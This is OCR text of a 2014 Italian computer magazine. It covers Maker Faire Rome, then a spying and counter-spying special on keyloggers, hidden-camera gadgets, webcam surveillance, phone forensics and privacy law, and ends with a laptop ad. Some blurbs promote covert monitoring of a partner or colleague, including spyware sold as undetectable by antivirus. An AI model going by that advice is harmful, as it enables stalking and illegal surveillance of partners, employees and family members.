mebrew Computer Club, che alla metà degli Anni 
70 rivoluzionò l'informatica, facendola finalmente 
uscire dai laboratori universitari. Osservare un maker 
al lavoro è dare un'occhiata al futuro che ci attende! 

Maker di tutto il mondo, unitevil 

Il fenomeno è di portata globale, quindi le occasioni 
per sbirciare nel futuro non mancano di certo. In 
più, la natura "non istituzionale"del movimento fa 


sì che anche l'Italia possa parteciparvi a testa alta. 
L'edizione europea della Maker Faire 2014 ha avuto 
luogo proprio a Roma (ne parliamo a pagina 6 di 
q uesto numero di Wi n Magazine). Dal 3 al 5 ottobre, i 
70.000 mq dell'auditorium Parco della Musica hanno 
ospitato creazioni di ogni genere, dando vita a un vero 
e proprio villaggio delllnnovazione. In un luogo dove 
l'eterogeneità è la regola, la stampa 3D rappresenta il 
filo rosso che unisce molte delle esperienze. A volte, 
poi, sono le stampanti stesse a rubare la scena, è il 
caso della Choco 3Drag, che usa come materiale di 
stampa il cioccolato. Un modo decisamente goloso 
per introdurre le possibili applicazioni della stam¬ 
pa 3D in campo alimentare (www.winmagazine. 
it/link/2823)! Non poteva mancare neppure una 
sfilata di moda, a ricordarci il lato più fashion della 
sperimentazione maker. L'organizzatore è il duo lon¬ 
dinese di CuteCIrcuit, che già nel 2006 aveva stupito 


il mondo con la sua Hug Shirt, la maglietta in grado di 
trasmettere a distanza gli abbracci (www.winmaga- 
zine.it/link/2824). Dalle action figures dei supereroi 
alle protesi su misura, le stampanti 3D sembrano in 
grado di creare qualsiasi cosa. Difficile lasciare la fiera 
senza desiderare di averne una in casa! Se così non 
fosse, non dimentichiamoci dello storico progetto Rep 
Rap, che mira a creare stampanti 3Dauto-replicabili 
(http://reprap.org). Se uno dei nostri amici ha una 
Rep Rap, è tempo di fargli una visita! 
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M ano sul cuore: quante volte abbiamo 
pensato di mettere il naso nel PC di 
nostro figlio o in quello di un collega; 
oppure ci sarà capitato di pensare di spiare 
la babysitter o il dipendente attraverso una 
videocamera nascosta. Nonostante ci siano 
precise violazioni in merito, diverse persone 
praticano regolarmente azioni di spionaggio 
nei confronti dei propri familiari e colleghi. 
Naturalmente i fini possono essere diversi: si 
va dal controllo per scopi precauzionali sino 
a giungere ai casi più gravi, di furto di dati 
sensibili. Per evitare brutte sorprese e, soprat¬ 
tutto, proteggersi da occhi indiscreti occorre 
prendere coscienza degli strumenti utilizzati 
dagli spioni in modo da adottare opportune 
precauzioni. Insomma, come in tutte le attivi¬ 


tà, bisogna approfondire l’argomento e 
indagare su quelli che sono gli strumenti 
specifici in modo da poterli individuare 
e quindi neutralizzare. Nello speciale di 
queste pagine abbiamo raccolto una serie 
di utility con le quali registrare tutto ciò che 
viene digitato sulla tastiera del PC piuttosto 
che per offuscare dati sensibili in modo da 
poterli trasmettere in modo sicuro. In ultimo, 
abbiamo potuto testare alcune utility legate 
al mondo degli smartphone come la suite 
Oxigen Forensics, con la quale tenere traccia 
di tutto ciò che accade su uno smartphone. 

Ragionare come un “spione” 

Tra le utility maggiormente utilizzate dagli 
spioni figurano sicuramente i keylogger. Si 


SULLE ORME DELLE SPIE CINEMATOGRAFICHE 


N ella storia del cinema sono numerosi 
i titoli dedicati al mondo dello 
spionaggio. Uno di questi è The Lab 
(che trovi sul Win DVD-Rom in formato 
MP4), un film diretto dal regista di "Non 
aprite quella porta" e scritto da Shiban 
sceneggiatore di X-Files. La trama racconta 
le vicissitudini di Victor Helios che, in un 
laboratorio di New Orleans, è riuscito 
ad affinare la tecnica della cariogenesi 
(il congelamento di esseri umani). Una 
legione di superuomini sono sistemati in 
tutti i livelli della società e nei posti chiave 
con lo scopo di riuscire a conquistare il 
mondo. Ma il misterioso Deucalion vuole 
ostacolarlo. Per tutti Victor Helios è un 
insospettabile filantropo, ma O'Connore 
Sloane sono convinti che sia il mandante di 
alcuni efferati omicidi... 


SCHEDA TECNICA 

TITOLO ORIGINALE: THELAB 
NAZIONE: USA 
GENERE: HORROR 
REGISTA: MARCUS NISPEL 
CAST: MICHAEL MADSEN, 
VINCENT PEREZ, THOMAS 
KRETSCHMANN 
DURATA: 90MINUTI 
ANNO: 2004 


.1 »’ 

Ik 


Th^l 


92 Win Magazine Speciali 






> una spia | Fai da te | 




S T P 0 Y 0tK| P T 


SPYvsSPY 

TOOLKTT 

• Nasronòere informazioni 
nelefoto 

• Offuscare i propri dati 
sensibili 

• Scoprire le password di 
Windows 

• Trasformare la webcam 
il telecamera di 
videosorveglianza 


I migliori tool per spiare e non farsi 
spiare, da testare e utilizzare solo a fini 
personali. Li trovi tutti 
sul Win DVD-Rom. 


Secure Eraser 

Consente di eliminare i file dal PC senza che sia 
lasciata alcuna traccia e possibilità di recupero. 


Refog Free Keylogger 

Occorre tenere sotto controllo i figli o il partner? 
Se la risposta è affermativa, con Refog Free 
Keylogger è possibile intercettare le conversazioni 
in chat oppure scoprire i siti Web visitati ecc. 


Shadow Explorer 

Un software per Windows che rende possibile la 
visualizzazione e il ripristino dei file utilizzando le 
“copie Shadow” che il sistema operativo 
regolarmente esegue. 


Hktemy Windows 

Non vogliamo farci sorprendere dal capo mentre 
navighiamo sul Web? Con questo tool possiamo 
simulare l’esecuzione di software gestionali e 
scambiare le schermate con un solo die. 


GADGET HI-TECH DA VERI 007 


SilentEye 

Permette di nascondere messaggi segreti 
all'Interno di file audio o immagini; i dati possono 
inoltre essere protetti con password. 

Recuva 

Utile a ripristinare i file cancellati accidentalmente 
dal computer o dalle periferiche esterne come 
hard disk e pendrive USB. 

iSpy 

Il programma giusto per trasformare la Webcam 
in una telecamera per sorvegliare casa o ufficio. 

G Data Internet Security Suite 

Tutto l’occorrente per proteggersi da virus&Co. 

Casebook 

Gioco composto da quattro episodi in stile CSI in cui 
dovremo vestire i passi di un vero detective che dovrà 
analizzare nei minimi dettagli la scena del crimine. 

Il gioco lo trovi nolllntarfaccia principale 
dal Win DVD-Rom 


Extf Pilot 

Permette di creare e personalizzare le 
informazioni associate ad un immagine come, ad 
esempio, il tipo di macchina fotografica data e ora 
dello scatto e tanto altro ancora. 


Affinché le operazioni di spionaggio sia¬ 
no veramente efficace, occorre munirsi 
degli strumenti giusti. Sul Web è possibile 
reperire diversi dispositivi utili a questo 
tipo di attività: Amazon, ad esempio, offre 
diversi oggetti da poter utilizzare 
per attuare efficaci tecniche 
di "intelligence”. Al modico 
prezzo di 13,80 euro è 
possibile acquistare 
Spy P*n 4 GB, ovvero 
una penna in grado 
di registrare video e 
foto in formato HD. 

Sullo stesso portale di 
e-commerce, al prezzo 
di 68,50 euro, è possibile 
acquistare l'infallibile oro¬ 
logio SCI 03 Spy Pro HD 
1080P 4 GB IR che, oltre ad 
effettuare riprese e registra¬ 


zioni audio, permette anche le riprese 
notturne! Per attività da vero agente 007 
segnaliamo la micro spia per le inter¬ 
cettazioni ambientali: acquistabile su 
eBay al prezzo di 32,99 euro, consente 
di ascoltare a distanza una con¬ 
versazione. La microspia dispo¬ 
ne, infatti, di una scheda SIM: 
pertanto, telefonando al 
numero associato alla 
scheda sarà possibile 
ascoltare tutto ciò che 
succede nell'ambiente 
in cui è posizionata la 
cimice. Non manca ov¬ 
viamente la sveglia con 
telecamera nascosta in 
grado di rilevare il movimen¬ 
to e registrare video e foto: 
la si può acquistare sempre su 
eBay al prezzo di 23,42 euro. 


A scuola di hacker 


tratta, sostanzialmente, di software in grado 
di registrare tutto ciò che viene digitato sulla 
tastiera del computer. Ovviamente occor¬ 
re che il software venga preventivamente 
installato sulla nostra macchina prima di 
poterlo mettere in funzione per “rubare i 
nostri dati". La sua installazione 
richiede, quindi, del tempo 
ed è pertanto buona regola 
proteggere sempre il proprio 
PC con password, in modo 
da rendere la vita difficile 
allo spione di turno. Genera- 


■ Gli speciali bottoni con microspia incorporata 
possono essere applicati sulle bretelle di uno zaino e 
mimetizzarsi con una certa facilità (www.mondospy. 
com,€ 97,75). 
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ta una chiave di accesso al nostro account, 
poi, è importante ricordarci di premere sem¬ 
pre la combinazione di tasti Win+L prima 
di allontanarci dalla nostra postazione, 
in modo da bloccare la sessione attiva sul 
PC proteggendola proprio con la nostra 
password. Eviteremo così di lasciare incu¬ 
stodito il computer per molto tempo con¬ 
sentendo allo spione di agire indisturbato. 
Altro espediente potrebbe essere quello di 
anticipare le mosse dello spione installando 
sul proprio PC un software keylogger che in 
tal caso sarebbe sotto il nostro personale 
controllo e dunque andrebbe a registrare 


tutto ciò che accade sul PC quando siamo 
assenti. In merito ai documenti, il consiglio 
è quello di proteggerli con password e pre¬ 
feribilmente convertirli preventivamente in 
formato PDF, andando ad inserire alTintemo 
del testo (magari nell’intestazione o nel pie di 
pagina) la data di creazione del documento: 
in tal modo, se lo spione riesce a cambiare 
la data di creazione a livello di file, nel do¬ 
cumento rimane quella originale. 

Gli strumenti adatti 

Come accennato, per proteggersi dalle 
spie informatiche occorre conoscere gli 


strumenti che usano e saperli, a nostra 
volta, sfruttare al meglio. Per tale motivo, 
all’interno del Win DVD abbiamo inserito 
una serie di tool utili per l’attività di con¬ 
trospionaggio. Nelle pagine che seguono 
troviamo le spiegazioni di molti dei sof¬ 
tware inclusi nel supporto: pertanto, non 
resta che armarci di buona pazienza e con 
una buona dose di curiosità esplorarli uno 
ad uno, magari effettuando qualche test: 
così facendo, lo spione avrà vita dura ma, 
soprattutto, sapremo affrontare e risolvere 
le varie situazioni di pericolo man mano 
che si dovessero presentare! 



LO SPY SHOP PER VERI PROFESSIONISTI 


Per chi volesse fare sul serio con le tecniche di spionaggio e controspionaggio 
occorrono strumenti all'altezza delle varie situazioni che man mano si possono 
presentare. Naturalmente, il costo di certi dispositivi sale man mano che le pretese 
di affidabilità e qualità crescono. Il mercato offre oggigiorno congegni a basso 
costo in grado di svolgere (almeno sulla carta) registrazioni e altre funzionalità 
che però non sempre si rilevano all'altezza. Scoprire di aver registrato audio di 
scarsa qualità oppure video a bassa risoluzione può significare compromettere 
tutto il lavoro svolto. Per evitare di sbagliare almeno negli acquisti dei dispositivi, 
ci si può rivolgere ai negozi specializzati che pullulano sul Web. Ecco cosa si trova. 

Rilevatore di microspie 

Tra gli strumenti che non dovrebbero mancare nella cassetta del perfetto agente 
007 figura sicuramente il rilevatore di microspie (www.mondospy.com), ovvero 
un dispositivo in grado di rilevare se in una stanza si nascondono cimici; si tratta, in 
sostanza, di un localizzatore di frequenze in grado di intercettare le trasmissioni in 
un ambiente chiusoe dunque di rilevare la presenza o meno di apparecchiature 
elettroniche in grado di trasferire dati a nostra insaputa. 

Valigetta di bonifica 

Per maggiore affidabilità, al costo di qualche migliaio di euro possia¬ 
mo procurarci una valigetta di bonifica (acquistabile sul sito www. 
microspie.org) capace di scoprire attraverso un'apposita e sofisticata 
apparecchiatura tutte le cimici nascoste in una determinata area. 


Software di controllo 

Per azioni di spionaggio sul PC ci si può affidare a Condor-KS (www. 
protezioneglobale.com) Unnovativo software realizzato da specia¬ 
listi del settore che permette la sorveglianza nascosta di un PC. In 
pratica il software, una volta installato, registra tutti i dati digitati sulla 
tastiera, i siti Web visitati, le password, gli screenshot e quant'altro. 
Condor-KS non viene rilevato dagli antivirus e da antispyware e non 
crea rallentamenti in modo da destare il minimo sospetto. Tutte le 
azioni sono registrate con data e ora.Trascorso qualche giorno, lo spione, 
approfittando di una nostra temporanea assenza, connetterà una chia¬ 
vetta USB al computer e con un die trasferirà tutti i dati acquisiti. Non 
verrà lasciata mai nessuna traccia e con un altro clic sarà possibile 
disinstallare il programma. 


■ Gli occhiali con binocolo incorporato possono 
rendersi utili per osservare a distanza i movimenti 
di persone senza l'uso delle mani 













Così si spia una spia | Fai da te | 


A scuola di hacker 


La parola all'avvocato 




■ Guido Scorza 
è uno dei massimi esperti in 
Diritto delle Nuove Tecnologie 


SPIONAGGIO E 
CONTROSPIONAGGIO: 
COSA DICE LA LEGGE? 

Oggigiorno si potrebbe spiare la donna delle 
pulizie per verifica me il comportamento oppure 
un dipendente per verificarne la resa sul posto 
di lavoro. L'attività di spionaggio assume molte 
sfaccettature: per chiarire la legalità di certe 
operazioni abbiamo quindi chiesto un pare¬ 
re all'avvocato Guido Scorza, uno dei massimi 
esperti italiani in diritto delle nuove tecnologie. 

Qualora dovessimo forzare la password di Win¬ 
dows del PC dei nostri colleghi, in quali sanzioni 
possiamo andare incontro? 

Direi che è meglio non provarci, neppure per scherzo. 
Accedere al PC o a qualsiasi altro dispositivo o rete 
altrui senza permesso costituisce reato (accesso abu¬ 
sivo a sistema informatico o telematico) e può costare 
caro: fino a tre anni di prigione. Specie nel 2014, in 
fondo, entrare nel PC altrui è un po'come violare il 
suo domicilio, entrare a casa sua o nel suo ufficio. 
Senza contare che se poi, una volta nel PC, si sbircia 
nei dati personali che vi sono contenuti, si possono 
commettere tutta una serie di altri reati connessi alla 
violazione della privacy che rischiano di "costare" 
altrettanto. Insomma mettere le mani nel barattolo 
della marmellata di una volta era, sicuramente, meno 
pericoloso. 

Cosa ci può dire in merito alle videocamere di 
sorveglianza? È possibile installarle ovunque? 


È possibile installarle laddove sussistano ragioni - 
normalmente di sicurezza - che ne giustifichino 
l'utilizzo e soprattutto giustifichino la limitazione 
dell'altrui privacy che certamente l'installazione di 
una telecamera comporta. Deve trattarsi di una reale 
necessità e, soprattutto, di una necessità proporzio¬ 
nata alla limitazione della privacy che si determina. In 
ogni caso, poi, le telecamere di sorveglianza devono 
essere installate nel rispetto delle regole dettate dal 
Garante per la privacy che, tra l'altro, stabiliscono 
che i soggetti che gravitano nell'area oggetto di 
telesorveglianza devono essere informati della circo¬ 
stanza che "non sono soli" Guai, peraltro, a pensare 
che basta un cartello e che poi si può fare ciò che si 
vuole delle immagini che si acquisiscono. Le imma¬ 
gini raccolte attraverso le telecamere devono essere 
conservate solo per il periodo strettamente necessario 
alla soddisfazione delle esigenze di sicurezza che ne 
hannogiustificato l'insta nazione e devono poi essere 
cancellate senza ritardo. 

Un datore di lavoro potrebbe spiare i propri 
dipendenti attraverso videocamere nascoste? 

Assolutamente no! Lo vieta la disciplina sulla privacy 
e lo vieta lo statuto dei lavoratori. In linea generale 
nessuno può'spiare"nessuno e men che meno i pro¬ 
pri lavoratori."Spiare" ovvero osservare di nascosto, 
specie attraverso strumenti a distanza, è legittimo 
solo se a farlo sono le forze dell'ordine previo ido¬ 
neo provvedimento dell'Autorità giudiziaria e, in 
casi davvero particolari, gli investigatori privati ed i 
giornalisti. Spiare è sempre più facile grazie ad un'infi¬ 
nità di gadget tecnologici ma non per questo è anche 
sempre più legittimo. 

Diversi software integrano al loro interno dei 
keylogger che spesso passano inosservati agli 
utenti, raccogliendo così dati preziosi circa le 
abitudini di chi usa il computer. I produttori di 
software possono monitorare i PC degli utenti 
senza previo consenso? 

Il keylogger è uno dei più giovani membri della fa¬ 


miglia degli"spioni tecnologici". Valgono per questo 
tipo di software le considerazioni appena fatte per gl i 
spioni a mezzo telecamere o analoghi dispositivi tec¬ 
nologici. Spiare cosa faccio sul e con il mio computer 
èreatoetrattareabusivamente-owerosenza il mio 
permesso i dati così acquisiti - è un altro reato. Sarà 
amache facile ma proprio non lo si può fare se si tiene 
alla propria libertà e, soprattutto, se si ama la legalità. 

Come mai esistono tanti programmi liberamente 
scaricabili con i quali poter violare le leggi? Non 
dovrebbero essere vietati? 

Se potessi rispondere alla domanda con una doman¬ 
da, vi chiederei: perché si producono macchine che 
vanno tanto veloci se poi esistono limiti di velocità 
tanto stringenti? Fuor di battute, il punto è che la 
tecnologia non è mai né lecita, né illecita ma dipende 
sempre da come la si usa e, in taluni casi, da perché e 
chi la usa. Una pistola può essere usata per legittima 
difesa o per ammazzare qualcuno. Vale la stessa re¬ 
gola per queste tecnologie. Possono installarmi un 
keylogger trasparente sul mio PC per evitare che altri 
non lo usino a mia insaputa... 

È possibile tracciare la posizione GPS di un per¬ 
sona per poi trasmetterla a terzi? 

Sì, con il permesso del la persona tracciata, nel rispetto 
delle regole dettate dal Garante privacy e, soprattutto, 
dopo aver notificato a quest'ultimo il trattamento 
che intende porre in essere. No, in assenza di questi 
requisiti. E'una delle sfide più delicate in termini di 
privacy. Ormai la tecnologia da indossare si sta diffon¬ 
dendo a macchia d'olio e, soprattutto, c'è un GPS in 
ogni smartphone. Una montagna di dati che fa e farà 
sempre più gola ai signori del marketing. Ma sapere 
dove si trova una persona e qua le zona frequenta più 
spesso significa intromettersi pesantemente nella sua 
vita privata. Non è cosa che si possa fare solo perché 
tecnologicamente facile. 


■ Questo dispositivo, dalle dimensioni di un 
Il cavetto USB nasconde una micro camera in grado pacchetto di sigarette, nasconde un trasmettitore in 
di registrare tutto dò che avviene davanti al PC. grado di registrare i movimenti di un veicolo. 
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IMIGUORI TOOL 
PER LO SPIONAGGIO 


Dati “piccanti”: 
cancellali così 

Cancellare i file dal 
cestino di Windows 
non significa 
eliminarlii 

definitivamente: per 
cancellare ogni 
traccia dei file 
possiamo affidarci a Secure Eraser. Dopo averlo 
installato cucchiamo File & Folder deletion dalla 
finestra che appare, aggiungiamo i file e/o le cartelle 
che vogliamo eliminare e scegliamo un metodo di 
cancellazione, ad esempio Highest - Peter Gutmann 
Standard. 


Nascondere le 
schermate 

Per non farsi beccare 
in ufficio su Facebook 
possiamo usare Hide 
My Windows. Dopo 
avere installato il 
programma possiamo 
definire un'azione o 
una combinazione di 
tasti da premere, ad 
esempio Ctrl+Alt+I, 
per nascondere il browser o ridurre a icona le varie 
finestre aperte sul desktop. Volendo, dal menu View/ 
Option possiamo anche impostare una password di 
protezione. 




KEYLOGGER E TOOL DI MONITORAGGIO 


I software keylogger possono registrare 
quello che viene digitato con la tastiera del 
PC. Una volta installato, il programma avvia 
la registrazione di tutto ciò che accade sul 
computer, compresi i testi digitati in Word, 
le password di accesso ai vari servizi on-line, 
le credenziali di accesso del conto corrente 
bancario, la cronologia dei siti Web visitati e 
tanto altro ancora. Lo spione potrà dunque 
impadronirsi di una serie di dati sensibili man 
mano che vengono digitati dall'utente ignaro. 
Tutto ciò che viene registrato potrà essere 
inviato via FTP oppure memorizzato su una 
chiavetta USB. 



I tool di monitoraggio, invece, aggiungono 
ulteriori funzionalità all'azione di un semplice 
keylogger: permettono, infatti, di registra¬ 
re quando vengono compiute determinate 
azioni e soprattutto consentono di inviare i 
dati di log via e-mail. Software come Refrog 
Personal Monitor permettono di impostare 
i parametri di un account e-mail e di inviare 
all'indirizzo specifico i dati di log ad intervalli 
di tempo stabiliti in fase di setup. Il file inviato 
potrà contenere tutto ciò che riguarda la 
cronologia Web piuttosto che i documenti 
aperti sul PC o ancora alcune foto scattate 
dalla Webcam. 



Ti spio con una Webcam 

Vuoi scoprire chi usa di nascosto il tuo computer o mette mano sulla tua scrivania? Per farlo bastano una 
Webcam e un software in grado di trasformarla in una videocamera di sorveglianza. Ecco come. 
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Riorese in diretta dal Web 

1 Installiamo innanzitutto il tool ISpy, awia- 
f molo e dal menu Options scegliamo la lin- 

LL 

Per fare In modo che la registrazione inizi 
' quando la Webcam rileva un movimento, 


Per controllare ciò che awiene sul PC pos¬ 
siamo connetterci alla Webcam da remo- 


gua Italiano. Quindi clicchiamo Aggiungi e poi 
Camera locale : il software rileverà automatica- 
mente la Webcam. Confermando con il pulsante 
Bene apparirà un riquadro con la nostra faccia in 
primo piano. 


clicchiamo nel riquadro Video e poi su Modifica. In 
Rilevazione movimento, senza cambiare le impo¬ 
stazioni di default, clicchiamo Fine. Per interrom¬ 
pere le registrazioni clicchiamo sul pulsante con 
il fulmine. 


to. Da Impostazioni Web/lmpostazioni Web Ser¬ 
veremmo un nuovo account. In seguito, con un 
semplice login possiamo prendere il controllo della 
videocamera e spiare chi utilizza il sistema. 
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Così si spia una spia | Fai da te | 


A scuola di hacker 


SFIDA DI SPIONAGGIO CON LO SMARTPHONE 


Gli smartphone hanno assunto 
un ruolo fondamentale nella 
vita di tutti i giorni: possiamo 
tenerci in contatto con amici 
e parenti e condividere quasi 




in tempo reale tutte le nostre 
emozioni mediante immagini, 
video e messaggi di testo. Al 
contempo, però, siamo molto 
più vulnerabili visto che le no¬ 


stre abitudini possono rilevarsi 
con una certa facilità. Basta un 
software spia per registrare tut¬ 
to ciò che facciamo e comuni¬ 
chiamo attraverso il cellulare. 


Ecco quindi la simulazione di 
un duello tra spione e spiato co¬ 
sì da indicare a ciascuna azione 
di spionaggio una opportuna 
contromisura. 


Lo spione potrebbe manomettere il cellulare in modo da assicurarsi il suo 
controllo: potrebbe, ad esempio, scoprire la posizione geografica e rubare 
altre informazioni strettamente personali come le password che solitamente 
memorizziamo nella memoria del dispositivo. Naturalmente lo spione 
dovrebbe impadronirsi dello smartphone a nostra insaputa e conoscere 
eventualmente la password di 


IMPOSTIAMO ANTIFURTO E PASSWORD 

Per evitare che lo smartphone cada in mani sbagliate occorre, anzitutto, impostare 
una password sicura composta da una stringa lunga almeno 8 caratteri composta da 
numeri, lettere minuscole e maiuscole. Per le password legate ad altri servizi, corre 
in nostro aiuto l'app Secure Vault, Password Manager. Le password memorizzate 
possono essere suddivise per categoria e, cosa importante, al momento della 
chiusura dell'app le informazioni vengono criptate sulla scheda SD del telefono. 


Se lo smartphone cade in mani sbagliate potrebbe essere sottoposto ad 
una analisi forense. In sostanza, lo spione potrebbe svolgere un'indagine in 
modo da risalire ad una serie di informazioni che riguardano, ad esempio, 
l'elenco delle telefonate inviate e ricevute, recupero dei messaggi di testo e 
altre informazioni strettamente personali. Per compiere una simile analisi, 
lo spione si avvale dell'applicazione gratuita Oxigen Forensics Suite (www. 
oxygen-forensic.com/en/). Una volta installata sul telefono dell'Ignaro 
malcapitato, permette di estrarre con pochi passaggi tutte le informazioni 
che occorrono, comprese ad esempio le coordinate GPS, le foto ecc. 


CRIPTARE IL DISPOSITIVO 

Si potrebbe ad esempio criptare il contenuto dello smartphone in modo da 
renderli inaccessibili se non dopo aver inserito una chiave di sblocco. Chi non 
conosce password o PIN non potrà accedere ai file crittografati contenuti nella 
memoria del dispositivo. Il rovescio della medaglia è una maggiore lentezza del 
cellulare nel rispondere ai comandi. La crittografia, inoltre, è un processo di sola 
andata: una volta che i file sono stati criptati non potranno più tornareal loro stato 
"originario". Solamente riportando il dispositivo alle impostazioni di fabbrica si 
potranno annullare gli effetti del criptaggio. Inoltre, se qualcosa dovesse andare 
storto nel corso del processo, si rischierebbe di perdere definitivamente tutti i dati. 
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ASUS Transformer Book Flip 

Capovolgi il tuo punto di vista 



ASUS Transformer Book Flip, il notebook versatile che si adatta alle tue esigenze. Ruota, gira e piega lo schermo: ASUS Transformer Book Flip ti darà la possibilità di 
avere più soluzioni con un semplice gesto. Da notebook a tablet rapidamente o anche in modalità stand per condividere con chi vuoi video, musica e presentazioni in 
maniera coinvolgente. ASUS Transformer Book Flip garantisce alte prestazioni e una eccellente autonomia grazie al processore Intel® Core™ di ultima generazione, 
Windows 8.1 ed alla grafica dedicata NVIDIA. 
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Lavora meglio. Divertiti di più. Windows 








